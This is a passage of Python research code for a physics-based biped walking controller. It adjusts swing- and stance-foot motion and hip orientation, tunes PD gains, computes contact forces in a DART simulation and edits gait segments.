for heel strike and ankle pushup\n # motion_swf_placement[frame].mulJointOrientationGlobal(swingFoot, mm.exp([0., 0., -0.17*t_swing_foot_placement]))\n # motion_swf_placement[frame].mulJointOrientationGlobal(swingFoot, mm.exp([0.2*t_swing_foot_placement, 0., 0.]))\n\n # hwangpil\n # foot placement based on difference\n # CM = dartModel.getBody(\"Hips\").com()\n swf = dartModel.getJointPositionGlobal(swingFoot)\n CMr_swf = CM - swf\n\n # CM_tar = motion_seg.getJointPositionGlobal(0, prev_frame)\n swf_tar = motion_seg[frame].getJointPositionGlobal(swingFoot)\n CMr_swf_tar = CM_tar - swf_tar\n\n CMr_swf_proj = mm.projectionOnPlane(CMr_swf, mm.unitX(), mm.unitY())\n CMr_swf_tar_proj = mm.projectionOnPlane(CMr_swf_tar, mm.unitX(), mm.unitY())\n\n angle = mm.getAngleFromVectors(CMr_swf_proj, CMr_swf_tar_proj)\n\n motion_swf_placement[frame].mulJointOrientationGlobal(swingLeg, mm.exp(mm.unitZ(), -.2*angle))\n\n # diff_CMr_swf = mm.projectionOnPlane(CMr_swf-CMr_swf_tar, (1,0,0), (0,0,1))\n #\n # newPosition = motion_swf_placement[frame].getJointPositionGlobal(swingFoot)\n # # newPosition += (diff_CMr_swf + diff_dCM)*t_swing_foot_placement\n # newPosition += 0.1*diff_CMr_swf * t_swing_foot_placement\n # aik.ik_analytic(motion_swf_placement[frame], swingFoot, newPosition)\n\n # restore swing foot global orientation\n motion_swf_placement[frame].setJointOrientationGlobal(swingFoot, R_swf)\n\n prev_R_swp[0] = (R_swp_sag, R_swp_cor)\n\n # swing foot height\n # TODO:\n # in segment foot case, hip has noise largely\n toe_offset = 0.\n motion_swf_height.append(motion_swf_placement[frame].copy())\n motion_swf_height.goToFrame(frame)\n if SWING_FOOT_HEIGHT:\n for swingFoot in swingFoots:\n stanceFoot = stanceFoots[0]\n\n # save foot global orientation\n R_foot = motion_swf_height[frame].getJointOrientationGlobal(swingFoot)\n R_stance_foot = motion_swf_height[frame].getJointOrientationGlobal(stanceFoot)\n\n d_height_tar = 0\n if OLD_SWING_HEIGHT:\n height_tar = motion_swf_height[frame].getJointPositionGlobal(swingFoot)[1] \\\n - motion_swf_height[frame].getJointPositionGlobal(stanceFoot)[1]\n else:\n height_tar = motion_swf_height[prev_frame].getJointPositionGlobal(swingFoot)[1] - groundHeight\n d_height_tar = motion_swf_height.getJointVelocityGlobal(swingFoot, prev_frame)[1]\n\n # rotate\n motion_swf_height[frame].rotateByTarget(dartModel.getJointOrientationGlobal(0))\n\n d_height_cur = 0\n if OLD_SWING_HEIGHT:\n height_cur = motion_swf_height[frame].getJointPositionGlobal(swingFoot)[1] \\\n - motion_swf_height[frame].getJointPositionGlobal(stanceFoot)[1]\n else:\n height_cur = dartModel.getJointPositionGlobal(swingFoot)[1] - halfFootHeight - c_swf_offset\n # height_cur = dartModel.getJointPositionGlobal(swingFoot)[1] - halfFootHeight\n d_height_cur = dartModel.getJointVelocityGlobal(swingFoot)[1]\n\n if OLD_SWING_HEIGHT:\n offset_height = (height_tar - height_cur) * swf_height_func(t) * c5\n else:\n offset_height = ((height_tar - height_cur) * c5\n + (d_height_tar - d_height_cur) * c6) * swf_height_func(t)\n\n offset_sine = c_swf_mid_offset * swf_height_sine_func(t)\n\n offset = 0.\n offset += offset_height\n offset += offset_sine\n\n if offset > 0.:\n newPosition = motion_swf_height[frame].getJointPositionGlobal(swingFoot)\n newPosition[1] += offset\n aik.ik_analytic(motion_swf_height[frame], swingFoot, newPosition)\n else:\n if HIGHER_OFFSET:\n newPosition = motion_swf_height[frame].getJointPositionGlobal(stanceFoot)\n newPosition[1] -= offset\n aik.ik_analytic(motion_swf_height[frame], stanceFoot, 
newPosition)\n\n                motion_swf_height[frame].rotateByTarget(R_root)\n\n                # restore foot global orientation\n                motion_swf_height[frame].setJointOrientationGlobal(swingFoot, R_foot)\n                motion_swf_height[frame].setJointOrientationGlobal(stanceFoot, R_stance_foot)\n\n                toe_offset = offset\n\n                if plot is not None:\n                    plot.addDataPoint('debug1', frame, offset_height)\n                    # plot.addDataPoint('debug2', frame, height_cur)\n                    # plot.addDataPoint('diff', frame, diff)\n\n        # stance foot push\n        motion_stf_push.append(motion_swf_height[frame].copy())\n        motion_stf_push.goToFrame(frame)\n        if STANCE_FOOT_PUSH:\n            # for swingFoot in swingFoots:\n            for stanceFoot in stanceFoots:\n                stf_push_func = yfg.concatenate([yfg.sine, yfg.zero], [c_taking_duration*2])\n\n                R_swp_sag = mm.exp((step_length_tar[0] - step_length_cur[0])*step_axis[0] * K_stp_pos * -stf_push_func(t))\n\n                motion_stf_push[frame].mulJointOrientationGlobal(stanceFoot, R_swp_sag)\n\n        # '''\n        # stance foot stabilize\n        motion_stf_stabilize.append(motion_stf_push[frame].copy())\n        motion_stf_stabilize.goToFrame(frame)\n        if STANCE_FOOT_STABILIZE:\n            for stanceFoot in stanceFoots:\n                R_target_foot = motion_stf_push[frame].getJointOrientationGlobal(stanceFoot)\n                R_current_foot = motion_stf_stabilize[frame].getJointOrientationGlobal(stanceFoot)\n                motion_stf_stabilize[frame].setJointOrientationGlobal(stanceFoot,\n                                                                      mm.slerp(R_current_foot, R_target_foot, stf_stabilize_func(t)))\n        #'''\n\n        # stance foot balancing\n        # motion_stf_balancing.append(motion_stf_push[frame].copy())\n        # TODO:\n        # in the segment-foot case, the stance foot is unstable\n        motion_stf_balancing.append(motion_stf_stabilize[frame].copy())\n        motion_stf_balancing.goToFrame(frame)\n        if STANCE_FOOT_BALANCING:\n            R_stb = mm.exp(diff_dCM_axis * K_stb_vel * stf_balancing_func(t))\n            R_stb = np.dot(R_stb, mm.exp(diff_CMr_axis * K_stb_pos * stf_balancing_func(t)))\n            for stanceFoot in stanceFoots:\n                if frame < 5: break\n                if t > 0.5: break  # hwangpil\n                motion_stf_balancing[frame].mulJointOrientationGlobal(stanceFoot, R_stb)\n\n        # hwangpil\n        if SEGMENT_FOOT:\n            if SWING_FOOT_CLEARANCE:\n                print(t)\n                if 0.5 < t < 0.8:\n                    for swingToe in swingToes:\n                        toeAngle = -math.pi/6.\n                        motion_stf_balancing[frame].mulJointOrientationGlobal(swingToe, mm.rotZ(toeAngle))\n                elif t < 0.2:\n                    for swingToe in swingToes:\n                        toeAngle = math.pi/6.\n                        motion_stf_balancing[frame].mulJointOrientationGlobal(swingToe, mm.rotZ(toeAngle))\n\n            # hwangpil\n            # make the stance foot parallel to the ground once contact is made\n            if 0.1 < t < 0.9:\n                pos_toe = [dartModel.getJointPositionGlobal(stanceToe) for stanceToe in stanceToes]\n                pos_heel = dartModel.getJointPositionGlobal(stanceHeels[0])\n                up_vec = np.cross(pos_toe[1] - pos_heel, pos_toe[0] - pos_heel)\n                R_foot_diff = mm.getSO3FromVectors(mm.unitY(), up_vec)\n                # R_foot_diff = mm.getSO3FromVectors(up_vec, mm.unitY())\n                R_foot = mm.slerp(mm.I_SO3(), R_foot_diff, 0.05)\n                motion_stf_balancing[frame].mulJointOrientationGlobal(stanceFoots[0], R_foot)\n\n        # hwangpil\n        # swing foot height control\n        if False:\n            for swing_foot in swingFoots:\n                new_position = motion_seg[frame].getJointPositionGlobal(swing_foot)\n                aik.ik_analytic(motion_stf_balancing[frame], swing_foot, new_position)\n\n        # hwangpil\n        # hip adjusting\n        if True:\n            # get the hip orientation on the coronal plane\n            hip_ori_cur = dartModel.getJointOrientationGlobal(0)\n            hip_ori_tar = motion_stf_balancing[frame].getJointOrientationGlobal(0)\n\n            hip_ori_cur_x = np.dot(hip_ori_cur, mm.unitX())\n            hip_ori_cur_y = np.dot(hip_ori_cur, mm.unitY())\n            hip_ori_cur_z = np.dot(hip_ori_cur, 
mm.unitZ())\n hip_ori_cur_xy_2 = (hip_ori_cur_x + hip_ori_cur_y) * .5\n hip_ori_cur_yz_2 = (hip_ori_cur_y + hip_ori_cur_z) * .5\n hip_ori_cur_xz_2 = (hip_ori_cur_x + hip_ori_cur_z) * .5\n\n hip_ori_tar_x = np.dot(hip_ori_tar, mm.unitX())\n hip_ori_tar_y = np.dot(hip_ori_tar, mm.unitY())\n hip_ori_tar_z = np.dot(hip_ori_tar, mm.unitZ())\n hip_ori_tar_xy_2 = (hip_ori_tar_x + hip_ori_tar_y) * .5\n hip_ori_tar_yz_2 = (hip_ori_tar_y + hip_ori_tar_z) * .5\n hip_ori_tar_xz_2 = (hip_ori_tar_x + hip_ori_tar_z) * .5\n\n # hip_ori_cur_xy_2_projected = mm.projectionOnPlane(hip_ori_cur_xy_2, hip_ori_tar_x, hip_ori_tar_y)\n # hip_ori_cur_yz_2_projected = mm.projectionOnPlane(hip_ori_cur_yz_2, hip_ori_tar_y, hip_ori_tar_z)\n hip_ori_cur_xy_2_projected = mm.projectionOnPlane(hip_ori_cur_xy_2, mm.unitZ(), mm.unitY())\n hip_ori_cur_yz_2_projected = mm.projectionOnPlane(hip_ori_cur_yz_2, hip_ori_tar_y, hip_ori_tar_z)\n\n cor_angle = mm.getAngleFromVectors(hip_ori_cur_xy_2_projected, hip_ori_tar_xy_2)\n sag_angle = mm.getAngleFromVectors(hip_ori_cur_yz_2_projected, hip_ori_tar_yz_2)\n\n for stance_leg in stanceLegs:\n if stance_leg == motion_ori[0].skeleton.getJointIndex('LeftUpLeg'):\n motion_stf_balancing[frame].mulJointOrientationGlobal(stance_leg, mm.exp(hip_ori_tar_z, 1.*cor_angle))\n # motion_stf_balancing[frame].mulJointOrientationGlobal(stance_leg, mm.exp(hip_ori_tar_z, 1.5*cor_angle))\n else:\n motion_stf_balancing[frame].mulJointOrientationGlobal(stance_leg, mm.exp(hip_ori_tar_z, -1.*cor_angle))\n # motion_stf_balancing[frame].mulJointOrientationGlobal(stance_leg, mm.exp(hip_ori_tar_z, -1.5*cor_angle))\n # motion_stf_balancing[frame].mulJointOrientationGlobal(stance_leg, mm.exp(hip_ori_tar_x, sag_angle))\n\n for swing_leg in swingLegs:\n if swing_leg == motion_ori[0].skeleton.getJointIndex('LeftUpLeg'):\n motion_stf_balancing[frame].mulJointOrientationGlobal(swing_leg, mm.exp(hip_ori_tar_z, 1.*cor_angle))\n else:\n motion_stf_balancing[frame].mulJointOrientationGlobal(swing_leg, mm.exp(hip_ori_tar_z, -1.*cor_angle))\n\n # ankle push\n if False:\n for swing_foot in swingFoots:\n if t < 0.2:\n if swing_foot == motion_ori[0].skeleton.getJointIndex('LeftFoot'):\n motion_stf_balancing[frame].mulJointOrientationGlobal(swing_foot, mm.rotZ((1.-t/.2) * math.pi/6.))\n # motion_stf_balancing[frame].mulJointOrientationGlobal(swing_foot, mm.rotZ(math.pi/2.))\n\n # hwangpil\n # ankle push\n if False:\n for swing_foot in swingFoots:\n if t < 0.2:\n motion_stf_balancing[frame].mulJointOrientationGlobal(swing_foot, mm.rotZ((1.-t/.2) * math.pi/6.))\n # motion_stf_balancing[frame].mulJointOrientationGlobal(swing_foot, mm.rotZ(math.pi/2.))\n\n # hwangpil\n # stance foot tilting\n if True:\n for stance_foot in stanceFoots:\n if t > 0.5:\n R_stf_cur = dartModel.getJointOrientationGlobal(stance_foot)\n R_stf_tar = motion_stf_balancing[frame].getJointOrientationGlobal(stance_foot)\n diff_stf = mm.logSO3(np.dot(R_stf_tar, R_stf_cur.T))\n print('diff_stf: ', diff_stf)\n diff_stf[0] = 0.\n diff_stf[1] = 0.\n R_diff_stf = mm.exp(diff_stf)\n # motion_stf_balancing[frame].mulJointOrientationGlobal(stance_foot, R_diff_stf)\n\n\n\n # hwangpil\n # swing foot parallelizing with ground\n def swf_par_func(_x):\n if _x<.5:\n return -.5*math.pow(1.-2.*_x, 1./3.) + .5\n else:\n return .5*math.pow(2.*_x-1., 1./3.) 
+ .5\n\n if False:\n for swingFoot in swingFoots:\n swingBody = dartModel.getBody(swingFoot)\n for shapeNode in swingBody.shapenodes:\n if shapeNode.has_collision_aspect():\n geomType = shapeNode.shape.shape_type_name()\n geomT = np.dot(swingBody.world_transform(), shapeNode.relative_transform())\n if geomType == \"BOX\":\n shape = shapeNode.shape # type: pydart.BoxShape\n data = shape.size() * .5\n footVec = np.dot(geomT[:3, :3], np.array((0., 1., 0.)))\n R_swf_current = np.eye(3)\n R_swf_par = mm.getSO3FromVectors(footVec, np.array((0., 1., 0.)))\n motion_stf_balancing[frame].mulJointOrientationGlobal(swingFoot,\n mm.slerp(R_swf_current, R_swf_par, swf_par_func(t)))\n\n '''\n # swing foot heel strike adjustment\n # make heel as flat as possible to ground\n swf_heel_func = yfg.hermite2nd\n for swingHeel in swingHeels:\n joint_vec_cur = np.dot(dartModel.getJointOrientationGlobal(swingHeel), np.array((0., 0., 1.)))\n joint_vec_tar = copy.deepcopy(joint_vec_cur)\n joint_vec_tar[1] = 0.\n R_target_heel = mm.exp(swf_heel_func(t)*mm.logSO3(mm.getSO3FromVectors(joint_vec_cur, joint_vec_tar)))\n motion_stf_balancing[frame].mulJointOrientationGlobal(swingHeel, R_target_heel)\n # stance foot ankle pushup adjustment\n # stf_ankle_func = yfg.hermite2nd\n stf_ankle_func = lambda x: -2*(x**2)+3*(x**3)\n if len(stanceFoots) == 1:\n for stanceFoot in stanceFoots:\n R_target_ankle = mm.exp(stf_ankle_func(t)*mm.deg2Rad(30.)*np.array([1., 0., 0.]))\n motion_stf_balancing[frame].mulJointOrientationLocal(stanceFoot, R_target_ankle)\n # stance foot toe adjustment\n # stf_toe_func = yfg.hermite2nd\n stf_toe_func = lambda x: -2*(x**8)+3*(x**9)\n if len(stanceFoots) == 1:\n for stanceToe in stanceToes:\n # joint_vec_cur = np.dot(controlModel.getJointOrientationGlobal(stanceToe), np.array((0., 0., 1.)))\n ## joint_vec_cur = np.dot(motion_stf_balancing[frame].getJointOrientationGlobal(stanceToe), np.array((0., 0., 1.)))\n # joint_vec_tar = copy.deepcopy(joint_vec_cur)\n # joint_vec_tar[1] = 0.\n ## R_target_toe = mm.exp(stf_toe_func(t)*mm.logSO3(mm.getSO3FromVectors(joint_vec_cur, joint_vec_tar)))\n # R_target_toe = mm.getSO3FromVectors(joint_vec_cur, joint_vec_tar)\n # motion_stf_balancing[frame].mulJointOrientationGlobal(stanceToe, R_target_toe)\n R_target_toe = mm.exp(stf_toe_func(t)*mm.deg2Rad(-30.)*np.array([1., 0., 0.]))\n motion_stf_balancing[frame].mulJointOrientationLocal(stanceToe, R_target_toe)\n #'''\n\n # foot adjustment\n if SEGMENT_FOOT and False:\n # hfi.footAdjust(motion_stf_balancing[frame], footIdDic, SEGMENT_FOOT_MAG, SEGMENT_FOOT_RAD, .03)\n hfi.footAdjust(motion_stf_balancing[frame], footIdDic, SEGMENT_FOOT_MAG, SEGMENT_FOOT_RAD, toe_offset)\n\n\n # control trajectory\n # motion_control.append(motion_stitch[frame].copy())\n # motion_control.append(motion_swf_height[frame].copy())\n # motion_control.append(motion_match_stl[frame].copy())\n motion_control.append(motion_stf_balancing[frame].copy())\n motion_control.goToFrame(frame)\n\n #=======================================================================\n # tracking with inverse dynamics\n #=======================================================================\n\n weightMap = [1.] 
* (skeleton.getJointNum())\n\n if False:\n toeWeights = 0.001\n\n for jointIdx in lIDs:\n weightMap[jointIdx] = toeWeights\n\n for jointIdx in rIDs:\n weightMap[jointIdx] = toeWeights\n\n th_r = motion_control.getDOFPositions(frame)\n # th_r = motion_stitch.getDOFPositions(frame)\n # th_r = motion_ori.getDOFPositions(frame)\n th = dartModel.skeleton.q\n\n dth_r = motion_control.getDOFVelocities(frame)\n # dth_r = motion_ori.getDOFVelocities(frame)\n dth = dartModel.skeleton.dq\n\n ddth_r = motion_control.getDOFAccelerations(frame)\n # ddth_r = motion_ori.getDOFAccelerations(frame)\n # ddth_des = yct.getDesiredDOFAccelerations(th_r, th, dth_r, dth, ddth_r, Kt, Dt, weightMap)\n\n totalDOF = dartModel.getTotalDOF()\n ddth_des_flat = ype.makeFlatList(totalDOF)\n dth_r_flat = ype.makeFlatList(totalDOF)\n # ype.flatten(ddth_des, ddth_des_flat)\n # ype.flatten(dth_r, dth_r_flat)\n\n # print dartModel.skeleton.q[:6]\n # print dartModel.getBody(0).com(), dartModel.skeleton.joint(0).position_in_world_frame(), dartModel.skeleton.q[:6]\n\n\n del rd_frame2[:]\n rd_frame2.append(dartModel.getBody(0).world_transform())\n\n #=======================================================================\n # simulation\n #=======================================================================\n CP = mm.v3(0.,0.,0.)\n F = mm.v3(0.,0.,0.)\n avg_dCM[0] = mm.v3(0.,0.,0.)\n\n # external force rendering info\n if not isCma:\n del rd_forces[:]; del rd_force_points[:]\n for fi in forceInfos:\n if fi.startFrame <= frame and frame < fi.startFrame + fi.duration*(1/frameTime):\n rd_forces.append(fi.force)\n # rd_force_points.append(controlModel.getBodyPositionGlobal(fi.targetBody))\n rd_force_points.append(dartModel.getBodyPositionGlobal(fi.targetBody))\n\n contactPositions = None\n # dartModel.update(motion_ori[frame])\n pdController.setTartgetPose(th_r)\n\n # bodyIDs = [body.index_in_skeleton for body in dartModel.world.collision_result.contacted_bodies]\n\n if not isCma and not SEGMENT_GAIN_ADJUST:\n # change foot Kd and Kp\n if SEGMENT_FOOT:\n for dofs in footDofs:\n # pdController.setKpKd(dofs, 500., 20.)\n pdController.setKpKd(dofs, 50., 5.)\n\n for dofs in LeftFootDofs:\n pdController.setKpKd(dofs, getParamVal('LeftFootKp'), getParamVal('LeftFootKd'))\n\n for dofs in RightFootDofs:\n pdController.setKpKd(dofs, getParamVal('RightFootKp'), getParamVal('RightFootKd'))\n\n elif not isCma and SEGMENT_GAIN_ADJUST:\n # change foot Kd and Kp\n if SEGMENT_FOOT:\n if stanceFoots[0] == rID and t>0.2:\n for dof in lIDs:\n pdController.setKpKd(dof, 50., 5.)\n for dof in rIDs:\n pdController.setKpKd(dof, 500., 20.)\n elif stanceFoots[0] == lID and t > 0.2:\n for dof in rIDs:\n pdController.setKpKd(dof, 50., 5.)\n for dof in lIDs:\n pdController.setKpKd(dof, 500., 20.)\n else:\n for dof in footDofs:\n pdController.setKpKd(dof, 50., 5.)\n\n for dofs in LeftFootDofs:\n pdController.setKpKd(dofs, getParamVal('LeftFootKp'), getParamVal('LeftFootKd'))\n\n for dofs in RightFootDofs:\n pdController.setKpKd(dofs, getParamVal('RightFootKp'), getParamVal('RightFootKd'))\n\n elif True:\n # change foot Kd and Kp\n for dofs in LeftFootDofs:\n pdController.setKpKd(dofs, 300., 30.)\n\n for dofs in RightFootDofs:\n pdController.setKpKd(dofs, 300., 30.)\n\n for dofs in footDofs:\n pdController.setKpKd(dofs, 500., 20.)\n\n else:\n # change foot Kd and Kp\n for dofs in LeftFootDofs:\n pdController.setKpKd(dofs, 80., 10.)\n\n for dofs in RightFootDofs:\n pdController.setKpKd(dofs, 80., 10.)\n\n simulContactForces = np.zeros(3)\n cForcesControl = []\n 
cPointsControl = []\n\n if frame > 40:\n for i in range(stepsPerFrame):\n # bodyIDs, contactPositions, contactPositionLocals, contactForces = dartModel.calcPenaltyForce(bodyIDsToCheck, mus, Ks, Ds)\n bodyIDs = dartModel.skeleton.self_collision_check()\n\n # _tau = np.zeros(dartModel.skeleton.q.shape)\n _tau = pdController.compute()\n bodyIDs, contactPositions, contactPositionLocals, contactForces, timeStamp = \\\n hdls.calcLCPForces(motion_ori, dartModel.world, dartModel, bodyIDsToCheck, 1., _tau)\n # dartModel.applyPenaltyForce(bodyIDs, contactPositions, contactForces, localForce=False)\n # print('penalty force sum: ', sum(contactForce for contactForce in contactForces))\n\n _ddq = pdController.compute()\n controlTau = None\n if False and SEGMENT_FOOT:\n _ddq = pdController.compute()\n _ddq0 = _ddq[specifiedDofIdx]\n temp1, cPointsControl, temp3, cForcesControl, controlTau = hdls.calcLCPbasicControl(\n motion_ori, dartModel.world, dartModel, bodyIDsToCheck, mu, np.array([0., 300., 0.]), [1., 1., 1.],\n tau0=_ddq, variableDofIdx=footDofs)\n if not isCma:\n print('controlTau: ', controlTau)\n # dartModel.skeleton.set_accelerations(_ddq)\n\n dartModel.skeleton.set_forces(pdController.compute())\n # dartModel.skeleton.set_forces(pdController.compute()+balanceTorque)\n dartModel.step()\n sumForce = sum([(-contact.force if contact.bodynode1.name == 'ground' else contact.force)\n for contact in dartModel.world.collision_result.contacts])\n simulContactForces += sumForce\n '''\n if False and i % 5 == 0:\n # bodyIDs, contactPositions, contactPositionLocals, contactForces = vpWorld.calcPenaltyForce(bodyIDsToCheck, mus, Ks, Ds)\n bodyIDs, contactPositions, contactPositionLocals, contactForces, timeStamp \\\n = hls.calcLCPForcesHD(motion_ori, vpWorld, dartModel, bodyIDsToCheck, 1., ddth_des_flat, ddth_des_flat, solver='qp', hdAccMask=hdAccMask)\n\n if contactForces is not None:\n lContactNum = sum([sum([j==i for j in bodyIDs]) for i in lIDs])\n rContactNum = sum([sum([j==i for j in bodyIDs]) for i in rIDs])\n if 1 <= lContactNum <= 2:\n lbodyIDbs = [any([j==i for i in lIDs])for j in bodyIDs]\n lbodyIDs = [i for i, x in enumerate(lbodyIDbs) if x]\n for i in reversed(lbodyIDs):\n bodyIDs.pop(i)\n contactPositions.pop(i)\n contactPositionLocals.pop(i)\n contactForces.pop(i)\n\n if 1 <= rContactNum <= 2:\n rbodyIDbs = [any([j==i for i in rIDs])for j in bodyIDs]\n rbodyIDs = [i for i, x in enumerate(rbodyIDbs) if x]\n for i in reversed(rbodyIDs):\n bodyIDs.pop(i)\n contactPositions.pop(i)\n contactPositionLocals.pop(i)\n contactForces.pop(i)\n\n if contactForces is not None:\n vpWorld.applyPenaltyForce(bodyIDs, contactPositionLocals, contactForces)\n\n # print contactForces\n\n # apply external force\n for fi in forceInfos:\n if fi.startFrame <= frame and frame < fi.startFrame + fi.duration*(1/frameTime):\n # controlModel.applyBodyForceGlobal(fi.targetBody, fi.force)\n dartModel.getBody(fi.targetBody).add_ext_force(fi.force)\n\n # for i in rIDs+lIDs:\n # controlModel.setJointTorqueLocal(i, ddth_des[i])\n # controlModel.setDOFAccelerations(ddth_des)\n # controlModel.solveHybridDynamics()\n\n # if TORQUE_PLOT:\n # rhip_torques[frame] += mm.length(controlModel.getJointTorqueLocal(rUpLeg))\n # rknee_torques[frame] += mm.length(controlModel.getJointTorqueLocal(rKnee))\n # rankle_torques[frame] += mm.length(controlModel.getJointTorqueLocal(rFoot))\n\n # rd_torques[:] = [controlModel.getJointTorqueLocal(j)/100. 
for j in range(1, skeleton.getJointNum())]\n # rd_joint_positions[:] = controlModel.getJointPositionsGlobal()\n\n # vpWorld.step()\n # yvu.align2D(controlModel)\n '''\n\n\n '''\n if contactForces is not None and len(contactForces) > 0:\n CP += yrp.getCP(contactPositions, contactForces)\n F += sum(contactForces)\n '''\n avg_dCM[0] += dartModel.getJointVelocityGlobal(0)\n # avg_dCM[0] += yrp.getCM(controlModel.getJointVelocitiesGlobal(), bodyMasses, upperMass, uppers)\n # avg_dCM[0] += yrp.getCM(controlModel.getJointVelocitiesGlobal(), bodyMasses, totalMass)\n\n # if len(stanceFoots)>0:\n # avg_stf_v[0] += controlModel.getJointVelocityGlobal(stanceFoots[0])\n # avg_stf_av[0] += controlModel.getJointAngVelocityGlobal(stanceFoots[0])\n\n\n bodyIDs, contactPositions, contactPositionLocals, velocities = dartModel.getContactPoints(bodyIDsToCheck)\n\n contactPoints = [contact.point for contact in dartModel.world.collision_result.contacts]\n contactForces = [(-contact.force if contact.bodynode1.name == 'ground' else contact.force)\n for contact in dartModel.world.collision_result.contacts]\n\n sumForce = sum(contactForces)\n\n if not isCma and viewer.cForceWnd is not None:\n # graph calculated force\n viewer.cForceWnd.insertData('realForce', frame, simulContactForces[1]/stepsPerFrame)\n\n if not isCma:\n del rd_cForces[:]\n del rd_cPositions[:]\n for idx in range(len(contactPoints)):\n rd_cForces.append(contactForces[idx] / 50.)\n rd_cPositions.append(contactPoints[idx])\n\n del rd_cForcesControl[:]\n del rd_cPositionsControl[:]\n for idx in range(len(cForcesControl)):\n rd_cForces.append(cForcesControl[idx] / 50.)\n rd_cPositions.append(cPointsControl[idx])\n\n # bodyIDs = [body.index_in_skeleton() for body in contacted_bodies]\n # contacted_bodies = dartModel.world.collision_result.contacted_bodies # type: list[pydart.BodyNode]\n # bodyIDs = []\n # for body in contacted_bodies:\n # ground_skeleton = body.skeleton # type: pydart.Skeleton\n # if ground_skeleton.name == \"grount skeleton\":\n # print(\"hehe\")\n\n if not isCma:\n del rd_point2[:]\n if contactPositions is not None:\n rd_point2.extend(contactPositions)\n\n if not isCma:\n del rd_point1[:]\n rd_point1.append(dartModel.getCOM())\n\n if not isCma:\n del rd_point2[:]\n rd_point2.append(dartMotionModel.getCOM())\n\n\n CP /= stepsPerFrame\n F /= stepsPerFrame\n avg_dCM[0] /= stepsPerFrame\n\n # if len(stanceFoots)>0:\n # avg_stf_v[0] /= stepsPerFrame\n # avg_stf_av[0] /= stepsPerFrame\n # rd_vec1[0] = avg_stf_av[0]; rd_vec1[0][0] = 0.; rd_vec1[0][2] = 0.\n # rd_vecori1[0]= controlModel.getJointPositionGlobal(stanceFoots[0])\n\n #=======================================================================\n # segment editing\n #=======================================================================\n lastFrame = False\n\n # print curState\n # print bodyIDs\n\n if SEGMENT_EDITING:\n if curState==yba.GaitState.STOP:\n if frame == len(motion_seg)-1:\n lastFrame = True\n\n elif (curState==yba.GaitState.LSWING or curState==yba.GaitState.RSWING) and t > c_min_contact_time:\n contact = False\n\n if not SEGMENT_FOOT:\n # original box foot\n swingID = lID if curState==yba.GaitState.LSWING else rID\n\n if swingID in bodyIDs:\n minContactVel = 1000.\n for i in range(len(bodyIDs)):\n if bodyIDs[i]==swingID:\n vel = dartModel.getBodyVelocityGlobal(swingID, contactPositionLocals[i])\n vel[1] = 0\n contactVel = mm.length(vel)\n if contactVel < minContactVel: minContactVel = contactVel\n if minContactVel < c_min_contact_vel: contact = True\n\n else:\n # 
segmented foot\n swingIDs = copy.deepcopy(lIDs) if curState==yba.GaitState.LSWING else copy.deepcopy(rIDs)\n\n contact = False\n contact_count = 0\n\n for swingID in swingIDs:\n if swingID in bodyIDs:\n minContactVel = 1000.\n for idx in range(len(bodyIDs)):\n if bodyIDs[idx] == swingID:\n vel = dartModel.getBodyVelocityGlobal(swingID, contactPositionLocals[idx])\n vel[1] = 0\n contactVel = mm.length(vel)\n contact_count += 1\n if contactVel < minContactVel:\n minContactVel = contactVel\n if minContactVel < c_min_contact_vel and contact_count > 2:\n contact = True\n elif minContactVel < c_min_contact_vel and contact_count > 1 and prev_contact_count[0] > 1 :\n contact = True\n\n prev_contact_count[0] = contact_count\n\n extended[0] = False\n\n if contact:\n if not isCma:\n print(frame, 'foot touch')\n lastFrame = True\n acc_offset[0] += frame - cur_interval[1]\n\n elif frame == len(motion_seg)-1:\n if not isCma:\n print(frame, 'extend frame', frame+1)\n\n preserveJoints = []\n # preserveJoints = [lFoot, rFoot]\n # preserveJoints = [lFoot, rFoot, lKnee, rKnee]\n # preserveJoints = [lFoot, rFoot, lKnee, rKnee, lUpLeg, rUpLeg]\n stanceKnees = [rKnee] if curState==yba.GaitState.LSWING else [lKnee]\n preserveJoints = [stanceFoots[0], stanceKnees[0], stanceLegs[0]]\n\n diff = 3\n motion_seg_orig.extend([motion_seg_orig[-1]])\n motion_seg.extend(ymt.extendByIntegration_root(motion_seg, 1, diff))\n\n motion_stitch.extend(ymt.extendByIntegration_constant(motion_stitch, 1, preserveJoints, diff))\n\n extended[0] = True\n else:\n if frame == len(motion_seg)-1: lastFrame = True\n\n if lastFrame:\n if segIndex < len(segments)-1:\n if not isCma:\n print('%d (%d): end of %dth seg (%s, %s)'%(frame, frame-cur_interval[1],segIndex, yba.GaitState.text[curState], cur_interval))\n if plot is not None:\n plot.addDataPoint('diff', frame, (frame-cur_interval[1])*.01)\n\n if len(stanceFoots)>0 and len(swingFoots)>0:\n step_cur = dartModel.getJointPositionGlobal(0) - dartModel.getJointPositionGlobal(stanceFoots[0])\n step_tar = motion_seg[cur_interval[1]].getJointPositionGlobal(0) - motion_seg[cur_interval[1]].getJointPositionGlobal(stanceFoots[0])\n\n step_cur = mm.projectionOnPlane(step_cur, (1,0,0), (0,0,1))\n step_tar = mm.projectionOnPlane(step_tar, (1,0,0), (0,0,1))\n\n step_cur_sag, step_cur_cor = mm.projectionOnVector2(step_cur, direction)\n step_tar_sag, step_tar_cor = mm.projectionOnVector2(step_tar, direction)\n\n step_length_tar[0] = mm.length(step_tar_sag)\n if np.inner(step_tar_sag, step_cur_sag) > 0:\n step_length_cur[0] = mm.length(step_cur_sag)\n else:\n step_length_cur[0] = -mm.length(step_cur_sag)\n\n step_axis[0] = directionAxis\n\n seg_index[0] += 1\n curSeg = segments[seg_index[0]]\n stl_y_limit_num[0] = 0\n stl_xz_limit_num[0] = 0\n\n del motion_seg_orig[frame+1:]\n motion_seg_orig.extend(ymb.getAttachedNextMotion(curSeg, motion_seg_orig[-1], False, False))\n\n del motion_seg[frame+1:]\n del motion_stitch[frame+1:]\n transitionLength = len(curSeg)-1\n\n d = motion_seg[-1] - curSeg[0]\n d.rootPos[1] = 0.\n motion_seg.extend(ymb.getAttachedNextMotion(curSeg, d, True, False))\n\n if NO_FOOT_SLIDING:\n if segIndex == len(segments)-2:\n Rl = motion_control[-1].getJointOrientationLocal(lUpLeg)\n Rr = motion_control[-1].getJointOrientationLocal(rUpLeg)\n Rlk = motion_control[-1].getJointOrientationLocal(lKnee)\n Rrk = motion_control[-1].getJointOrientationLocal(rKnee)\n Rlf = motion_control[-1].getJointOrientationLocal(lFoot)\n Rrf = motion_control[-1].getJointOrientationLocal(rFoot)\n for p in 
